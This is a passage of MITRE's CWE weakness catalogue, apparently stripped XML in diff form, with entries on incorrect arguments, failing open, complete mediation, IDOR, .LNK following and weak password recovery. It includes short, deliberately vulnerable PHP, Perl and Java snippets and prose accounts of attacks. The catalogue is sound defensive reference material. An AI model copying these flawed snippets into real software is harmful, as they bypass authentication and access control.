arbitrary code. + + + + + Implementation + Refactoring + Refactor the code to avoid dynamic variable evaluation whenever possible. + + + Implementation + Input Validation + Use only allowlists of acceptable variable or function names. + + + Implementation + For function names, ensure that you are only calling functions that accept the proper number of arguments, to avoid unexpected null arguments. + + + + + CVE-2009-0422 + Chain: Dynamic variable evaluation allows resultant remote file inclusion and path traversal. + https://www.cve.org/CVERecord?id=CVE-2009-0422 + + + CVE-2007-2431 + Chain: dynamic variable evaluation in PHP program used to modify critical, unexpected $_SERVER variable for resultant XSS. + https://www.cve.org/CVERecord?id=CVE-2007-2431 + + + CVE-2006-4904 + Chain: dynamic variable evaluation in PHP program used to conduct remote file inclusion. + https://www.cve.org/CVERecord?id=CVE-2006-4904 + + + CVE-2006-4019 + Dynamic variable evaluation in mail program allows reading and modifying attachments and preferences of other users. + https://www.cve.org/CVERecord?id=CVE-2006-4019 + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Under-studied, probably under-reported. Few researchers look for this issue; most public reports are for PHP, although other languages are affected. This issue is likely to grow in PHP as developers begin to implement functionality in place of register_globals. + + + + CWE Content Team + MITRE + 2007-05-07 + Draft 6 + 2007-05-07 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2008-10-14 + updated Background_Details, Description + + + CWE Content Team + MITRE + 2011-03-29 + updated Description + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-02-21 + updated Common_Consequences, Observed_Examples, Potential_Mitigations, Relationships, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated References + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product calls a function, procedure, or routine with arguments that are not correctly specified, leading to always-incorrect behavior and resultant weaknesses. + + There are multiple ways in which this weakness can be introduced, including: + + the wrong variable or reference; + an incorrect number of arguments; + incorrect order of arguments; + wrong type of arguments; or + wrong value. + + + + + + + + Primary + This is usually primary to other weaknesses, but it can be resultant if the function's API or function prototype changes. + + + + + + + + Implementation + + + + + Other + Access Control + Quality Degradation + Gain Privileges or Assume Identity + This weakness can cause unintended behavior and can lead to additional weaknesses such as allowing an attacker to gain unintended access to system resources. + + + + + Other + Since these bugs typically introduce incorrect behavior that is obvious to users, they are found quickly, unless they occur in rarely-tested code paths. Managing the correct number of arguments can be made more difficult in cases where format strings are used, or when variable numbers of arguments are supported. + + + + + Build and Compilation + Once found, these issues are easy to fix. Use code inspection tools and relevant compiler features to identify potential violations. Pay special attention to code that is not likely to be exercised heavily during QA. + + + Architecture and Design + Make sure your API's are stable before you use them in production code. + + + + + The following PHP method authenticates a user given a username/password combination but is called with the parameters in reverse order. + + function authenticate($username, $password) { + + + // authenticate user + ... + } + authenticate($_POST['password'], $_POST['username']); + + + + This Perl code intends to record whether a user authenticated successfully or not, and to exit if the user fails to authenticate. However, when it calls ReportAuth(), the third argument is specified as 0 instead of 1, so it does not exit. + + sub ReportAuth {my ($username, $result, $fatal) = @_;PrintLog("auth: username=%s, result=%d", $username, $result);if (($result ne "success") && $fatal) {die "Failed!\n";}} + sub PrivilegedFunc{my $result = CheckAuth($username);ReportAuth($username, $result, 0);DoReallyImportantStuff();} + + + + In the following Java snippet, the accessGranted() method is accidentally called with the static ADMIN_ROLES array rather than the user roles. + + private static final String[] ADMIN_ROLES = ...;public boolean void accessGranted(String resource, String user) {String[] userRoles = getUserRoles(user);return accessGranted(resource, ADMIN_ROLES);} + private boolean void accessGranted(String resource, String[] userRoles) { + + + // grant or deny access based on user roles + ... + } + + + + + + CVE-2006-7049 + The method calls the functions with the wrong argument order, which allows remote attackers to bypass intended access restrictions. + https://www.cve.org/CVERecord?id=CVE-2006-7049 + + + + + DCL10-C + Maintain the contract between the writer and caller of variadic functions + + + EXP37-C + Call functions with the correct number and type of arguments + CWE More Abstract + + + DCL00-PL + Do not use subroutine prototypes + CWE More Abstract + + + EXP33-PL + Do not invoke a function in a context for which it is not defined + Imprecise + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2007-05-07 + Draft 6 + 2007-05-07 + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Other_Notes, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-10-29 + updated Detection_Factors, Other_Notes, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2010-02-16 + updated Detection_Factors + + + CWE Content Team + MITRE + 2010-06-21 + updated Description + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Incorrectly Specified Arguments + + + + When the product encounters an error condition or failure, its design requires it to fall back to a state that is less secure than other options that are available, such as selecting the weakest encryption algorithm or using the most permissive access control restrictions. + By entering a less secure state, the product inherits the weaknesses associated with that state, making it easier to compromise. At the least, it causes administrators to have a false sense of security. This weakness typically occurs as a result of wanting to "fail functional" to minimize administration and support costs, instead of "failing safe." + + + + + + + + Primary + + + + + + + + + + Failing Open + + + + + Architecture and Design + + + Implementation + + + + + Access Control + Bypass Protection Mechanism + Intended access restrictions can be bypassed, which is often contradictory to what the product's administrator expects. + + + + + Architecture and Design + Subdivide and allocate resources and components so that a failure in one part does not affect the entire product. + + + + + Switches may revert their functionality to that of hubs when the table used to map ARP information to the switch interface overflows, such as when under a spoofing attack. This results in traffic being broadcast to an eavesdropper, instead of being sent only on the relevant switch interface. To mitigate this type of problem, the developer could limit the number of ARP entries that can be recorded for a given switch interface, while other interfaces may keep functioning normally. Configuration options can be provided on the appropriate actions to be taken in case of a detected failure, but safe defaults should be used. + + + + + CVE-2007-5277 + The failure of connection attempts in a web browser resets DNS pin restrictions. An attacker can then bypass the same origin policy by rebinding a domain name to a different IP address. This was an attempt to "fail functional." + https://www.cve.org/CVERecord?id=CVE-2007-5277 + + + CVE-2006-4407 + Incorrect prioritization leads to the selection of a weaker cipher. Although it is not known whether this issue occurred in implementation or design, it is feasible that a poorly designed algorithm could be a factor. + https://www.cve.org/CVERecord?id=CVE-2006-4407 + + + + + A7 + Improper Error Handling + CWE More Specific + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + Since design issues are hard to fix, they are rarely publicly reported, so there are few CVE examples of this problem as of January 2008. Most publicly reported issues occur as the result of an implementation error instead of design, such as CVE-2005-3177 (Improper handling of large numbers of resources) or CVE-2005-2969 (inadvertently disabling a verification step, leading to selection of a weaker protocol). + + + + Pascal Meunier + Purdue University + 2008-01-18 + Draft 8 + 2008-01-30 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Description, Name, Relationships, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2009-01-12 + updated Description, Name + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2009-05-27 + updated Name + + + CWE Content Team + MITRE + 2010-12-13 + updated Research_Gaps + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Causal_Nature, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated References + + + CWE Content Team + MITRE + 2023-01-31 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Design Principle Violation: Not Failing Securely + Design Principle Violation: Not Failing Securely (aka 'Failing Open') + Not Failing Securely (aka 'Failing Open') + + + + The product uses a more complex mechanism than necessary, which could lead to resultant weaknesses when the mechanism is not correctly understood, modeled, configured, implemented, or used. + Security mechanisms should be as simple as possible. Complex security mechanisms may engender partial implementations and compatibility problems, with resulting mismatches in assumptions and implemented security. A corollary of this principle is that data specifications should be as simple as possible, because complex data specifications result in complex validation code. Complex tasks and systems may also need to be guarded by complex security checks, so simple systems should be preferred. + + + + + + Primary + + + + + + + + Unnecessary Complexity + + + + + Architecture and Design + + + Implementation + + + Operation + + + + + Other + Other + + + + + Architecture and Design + Avoid complex security mechanisms when simpler ones would meet requirements. Avoid complex data models, and unnecessarily complex operations. Adopt architectures that provide guarantees, simplify understanding through elegance and abstraction, and that can be implemented similarly. Modularize, isolate and do not trust complex code, and apply other secure programming principles on these modules (e.g., least privilege) to mitigate vulnerabilities. + + + + + The IPSEC specification is complex, which resulted in bugs, partial implementations, and incompatibilities between vendors. + + + HTTP Request Smuggling (CWE-444) attacks are feasible because there are not stringent requirements for how illegal or inconsistent HTTP headers should be handled. This can lead to inconsistent implementations in which a proxy or firewall interprets the same data stream as a different set of requests than the end points in that stream. + + + + + CVE-2007-6067 + Support for complex regular expressions leads to a resultant algorithmic complexity weakness (CWE-407). + https://www.cve.org/CVERecord?id=CVE-2007-6067 + + + CVE-2007-1552 + Either a filename extension and a Content-Type header could be used to infer the file type, but the developer only checks the Content-Type, enabling unrestricted file upload (CWE-434). + https://www.cve.org/CVERecord?id=CVE-2007-1552 + + + CVE-2007-6479 + In Apache environments, a "filename.php.gif" can be redirected to the PHP interpreter instead of being sent as an image/gif directly to the user. Not knowing this, the developer only checks the last extension of a submitted filename, enabling arbitrary code execution. + https://www.cve.org/CVERecord?id=CVE-2007-6479 + + + CVE-2005-2148 + The developer cleanses the $_REQUEST superglobal array, but PHP also populates $_GET, allowing attackers to bypass the protection mechanism and conduct SQL injection attacks against code that uses $_GET. + https://www.cve.org/CVERecord?id=CVE-2005-2148 + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + Pascal Meunier + Purdue University + 2008-01-18 + Draft 8 + 2008-01-30 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2009-01-12 + updated Description, Name + + + CWE Content Team + MITRE + 2010-12-13 + updated Name, Research_Gaps + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Causal_Nature + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated References + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Design Principle Violation: Not Using Economy of Mechanism + Failure to Use Economy of Mechanism + + + + The product does not perform access checks on a resource every time the resource is accessed by an entity, which can create resultant weaknesses if that entity's rights or privileges change over time. + + + + + + + Primary + + + + + + + + Implementation + + + Operation + + + + + Integrity + Confidentiality + Availability + Access Control + Other + Gain Privileges or Assume Identity + Execute Unauthorized Code or Commands + Bypass Protection Mechanism + Read Application Data + Other + A user might retain access to a critical resource even after privileges have been revoked, possibly allowing access to privileged functionality or sensitive information, depending on the role of the resource. + + + + + Architecture and Design + Invalidate cached privileges, file handles or descriptors, or other access credentials whenever identities, processes, policies, roles, capabilities or permissions change. Perform complete authentication checks before accepting, caching and reusing data, dynamic content and code (scripts). Avoid caching access control decisions as much as possible. + + + Architecture and Design + Identify all possible code paths that might access sensitive resources. If possible, create and use a single interface that performs the access checks, and develop code standards that require use of this interface. + + + + + When executable library files are used on web servers, which is common in PHP applications, the developer might perform an access check in any user-facing executable, and omit the access check from the library file itself. By directly requesting the library file (CWE-425), an attacker can bypass this access check. + + + When a developer begins to implement input validation for a web application, often the validation is performed in each area of the code that uses externally-controlled input. In complex applications with many inputs, the developer often misses a parameter here or a cookie there. One frequently-applied solution is to centralize all input validation, store these validated inputs in a separate data structure, and require that all access of those inputs must be through that data structure. An alternate approach would be to use an external input validation framework such as Struts, which performs the validation before the inputs are ever processed by the code. + + + + + CVE-2007-0408 + Server does not properly validate client certificates when reusing cached connections. + https://www.cve.org/CVERecord?id=CVE-2007-0408 + + + + + SFP20 + Race Condition Window + + + + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + Pascal Meunier + Purdue University + 2008-01-18 + Draft 8 + 2008-01-30 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Observed_Example, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2009-01-12 + updated Description, Name + + + CWE Content Team + MITRE + 2009-05-27 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-12-13 + updated Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Causal_Nature + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated References + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Design Principle Violation: Not Using Complete Mediation + Failure to Use Complete Mediation + + + + The system's authorization functionality does not prevent one user from gaining access to another user's data or record by modifying the key value identifying the data. + + Retrieval of a user record occurs in the system based on some key value that is under user control. The key would typically identify a user-related record stored in the system and would be used to lookup that record for presentation to the user. It is likely that an attacker would have to be an authenticated user in the system. However, the authorization process would not properly check the data access operation to ensure that the authenticated user performing the operation has sufficient entitlements to perform the requested data access, hence bypassing any other authorization checks present in the system. + For example, attackers can look at places where user specific data is retrieved (e.g. search screens) and determine whether the key for the item being looked up is controllable externally. The key may be a hidden field in the HTML form field, might be passed as a URL parameter or as an unencrypted cookie variable, then in each of these cases it will be possible to tamper with the key value. + One manifestation of this weakness is when a system uses sequential or otherwise easily-guessable session IDs that would allow one user to easily switch to another user's session and read/modify their data. + + + + + + + + + + + + Insecure Direct Object Reference / IDOR + The "Insecure Direct Object Reference" term, as described in the OWASP Top Ten, is broader than this CWE because it also covers path traversal (CWE-22). Within the context of vulnerability theory, there is a similarity between the OWASP concept and CWE-706: Use of Incorrectly-Resolved Name or Reference. + + + Broken Object Level Authorization / BOLA + BOLA is used in the 2019 OWASP API Security Top 10 and is said to be the same as IDOR. + + + Horizontal Authorization + "Horizontal Authorization" is used to describe situations in which two users have the same privilege level, but must be prevented from accessing each other's resources. This is fairly common when using key-based access to resources in a multi-user context. + + + + + Architecture and Design + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + High + + + Access Control + Bypass Protection Mechanism + Access control checks for specific user data or functionality can be bypassed. + + + Access Control + Gain Privileges or Assume Identity + Horizontal escalation of privilege is possible (one user can view/modify information of another user). + + + Access Control + Gain Privileges or Assume Identity + Vertical escalation of privilege is possible if the user-controlled key is actually a flag that indicates administrator status, allowing the attacker to gain administrative access. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + For each and every data access, ensure that the user has sufficient privilege to access the record that is being requested. + + + Architecture and Design + Implementation + Make sure that the key that is used in the lookup of a specific user's record is not controllable externally by the user or that any tampering can be detected. + + + Architecture and Design + Use encryption in order to make it more difficult to guess other legitimate values of the key or associate a digital signature with the key so that the server can verify that there has been no tampering. + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Evgeny Lebanidze + Cigital + 2008-01-30 + Draft 8 + 2008-01-30 + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Type + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2009-05-27 + updated Relationships + + + CWE Content Team + MITRE + 2009-10-29 + updated Common_Consequences + + + CWE Content Team + MITRE + 2010-06-21 + updated Relationships + + + CWE Content Team + MITRE + 2011-03-29 + updated Alternate_Terms, Applicable_Platforms, Description, Name, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2013-02-21 + updated Alternate_Terms, Common_Consequences + + + CWE Content Team + MITRE + 2013-07-17 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Description, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Alternate_Terms + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Alternate_Terms + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Access Control Bypass Through User-Controlled Key + + + + The product, when opening a file or directory, does not sufficiently handle when the file is a Windows shortcut (.LNK) whose target is outside of the intended control sphere. This could allow an attacker to cause the product to operate on unauthorized files. + The shortcut (file with the .lnk extension) can permit an attacker to read/write a file that they originally did not have permissions to access. + + + + + + Resultant + + + + + + + + + Windows symbolic link following + + + symlink + + + + + Operation + + + Low + + + Confidentiality + Integrity + Read Files or Directories + Modify Files or Directories + + + + + Architecture and Design + Separation of Privilege + + Follow the principle of least privilege when assigning access rights to entities in a software system. + Denying access to a file can prevent an attacker from replacing that file with a link to a sensitive file. Ensure good compartmentalization in the system to provide protected areas that can be trusted. + + + + + + CVE-2019-19793 + network access control service executes program with high privileges and allows symlink to invoke another executable or perform DLL injection. + https://www.cve.org/CVERecord?id=CVE-2019-19793 + + + CVE-2000-0342 + Mail client allows remote attackers to bypass the user warning for executable attachments such as .exe, .com, and .bat by using a .lnk file that refers to the attachment, aka "Stealth Attachment." + https://www.cve.org/CVERecord?id=CVE-2000-0342 + + + CVE-2001-1042 + FTP server allows remote attackers to read arbitrary files and directories by uploading a .lnk (link) file that points to the target file. + https://www.cve.org/CVERecord?id=CVE-2001-1042 + + + CVE-2001-1043 + FTP server allows remote attackers to read arbitrary files and directories by uploading a .lnk (link) file that points to the target file. + https://www.cve.org/CVERecord?id=CVE-2001-1043 + + + CVE-2005-0587 + Browser allows remote malicious web sites to overwrite arbitrary files by tricking the user into downloading a .LNK (link) file twice, which overwrites the file that was referenced in the first .LNK file. + https://www.cve.org/CVERecord?id=CVE-2005-0587 + + + CVE-2001-1386 + ".LNK." - .LNK with trailing dot + https://www.cve.org/CVERecord?id=CVE-2001-1386 + + + CVE-2003-1233 + Rootkits can bypass file access restrictions to Windows kernel directories using NtCreateSymbolicLinkObject function to create symbolic link + https://www.cve.org/CVERecord?id=CVE-2003-1233 + + + + + Windows Shortcut Following (.LNK) + + + FIO05-C + Identify files using multiple file attributes + + + SFP18 + Link in resource name resolution + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Under-studied. Windows .LNK files are more "portable" than Unix symlinks and have been used in remote exploits. Some Windows API's will access LNK's as if they are regular files, so one would expect that they would be reported more frequently. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Relationships, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Causal_Nature, Likelihood_of_Exploit, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2022-06-28 + updated Observed_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product contains a mechanism for users to recover or change their passwords without knowing the original password, but the mechanism is weak. + + It is common for an application to have a mechanism that provides a means for a user to gain access to their account in the event they forget their password. Very often the password recovery mechanism is weak, which has the effect of making it more likely that it would be possible for a person other than the legitimate system user to gain access to that user's account. Weak password recovery schemes completely undermine a strong password authentication scheme. + This weakness may be that the security question is too easy to guess or find an answer to (e.g. because the question is too common, or the answers can be found using social media). Or there might be an implementation weakness in the password recovery mechanism code that may for instance trick the system into e-mailing the new password to an e-mail account other than that of the user. There might be no throttling done on the rate of password resets so that a legitimate user can be denied service by an attacker if an attacker tries to recover their password in a rapid succession. The system may send the original password to the user rather than generating a new temporary password. In summary, password recovery functionality, if not carefully designed and implemented can often become the system's weakest link that can be misused in a way that would allow an attacker to gain unauthorized access to the system. + + + + + + + + + + + Architecture and Design + COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. + + + Implementation + + + High + + + Access Control + Gain Privileges or Assume Identity + An attacker could gain unauthorized access to the system by retrieving legitimate user's authentication credentials. + + + Availability + DoS: Resource Consumption (Other) + An attacker could deny service to legitimate system users by launching a brute force attack on the password recovery mechanism using user ids of legitimate users. + + + Integrity + Other + Other + The system's security functionality is turned against the system by the attacker. + + + + + Architecture and Design + Make sure that all input supplied by the user to the password recovery mechanism is thoroughly filtered and validated. + + + Architecture and Design + Do not use standard weak security questions and use several security questions. + + + Architecture and Design + Make sure that there is throttling on the number of incorrect answers to a security question. Disable the password recovery functionality after a certain (small) number of incorrect guesses. + + + Architecture and Design + Require that the user properly answers the security question prior to resetting their password and sending the new password to the e-mail address of record. + + + Architecture and Design + Never allow the user to control what e-mail address the new password will be sent to in the password recovery mechanism. + + + Architecture and Design + Assign a new temporary password rather than revealing the original password. + + + + + A famous example of this type of weakness being exploited is the eBay attack. eBay always displays the user id of the highest bidder. In the final minutes of the auction, one of the bidders could try to log in as the highest bidder three times. After three incorrect log in attempts, eBay password throttling would kick in and lock out the highest bidder's account for some time. An attacker could then make their own bid and their victim would not have a chance to place the counter bid because they would be locked out. Thus an attacker could win the auction. + + + + + 49 + Insufficient Password Recovery + + + + + + + + + + Allowed-with-Review + This entry appears to be frequently misused for any weakness related to password changes, even though the name focuses on "Password Recovery" for a "forgotten" password. + CWE-640 should only be used when there is a "password recovery" mechanism for forgotten passwords. Consider password-related entries under CWE-1390: Weak Authentication. + + + + + + This entry might be reclassified as a category or "loose composite," since it lists multiple specific errors that can make the mechanism weak. However, under view 1000, it could be a weakness under protection mechanism failure, although it is different from most PMF issues since it is related to a feature that is designed to bypass a protection mechanism (specifically, the lack of knowledge of a password). + This entry probably needs to be split; see extended description. + + + + Evgeny Lebanidze + Cigital + 2008-01-30 + Draft 8 + 2008-01-30 + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Description, Maintenance_Notes, Name, Relationships + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2009-05-27 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-02-16 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-12-13 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-03-29 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Demonstrative_Examples, Description, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Weak Password Recovery Mechanism + + + + The product constructs the name of a file or other resource using input from an upstream component, but it does not restrict or incorrectly restricts the resulting name. + This may produce resultant weaknesses. For instance, if the names of these resources contain scripting characters, it is possible that a script may get executed in the client's browser if the application ever displays the name of the resource on a dynamically generated web page. Alternately, if the resources are consumed by some application parser, a specially crafted name can exploit some vulnerability internal to the parser, potentially resulting in execution of arbitrary code on the server machine. The problems will vary based on the context of usage of such malformed resource names and whether vulnerabilities are present in or assumptions are made by the targeted technology that would make code execution possible. + + + + + + + + + Architecture and Design + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + Low + + + Integrity + Confidentiality + Availability + Execute Unauthorized Code or Commands + Execution of arbitrary code in the context of usage of the resources with dangerous names. + + + Confidentiality + Availability + Read Application Data + DoS: Crash, Exit, or Restart + Crash of the consumer code of these resources resulting in information leakage or denial of service. + + + + + Architecture and Design + Do not allow users to control names of resources used on the server side. + + + Architecture and Design + Perform allowlist input validation at entry points and also before consuming the resources. Reject bad file names rather than trying to cleanse them. + + + Architecture and Design + Make sure that technologies consuming the resources are not vulnerable (e.g. buffer overflow, format string, etc.) in a way that would allow code execution if the name of the resource is malformed. + + + + + SFP24 + Tainted input to command + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Evgeny Lebanidze + Cigital + 2008-01-30 + Draft 8 + 2008-01-30 + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + 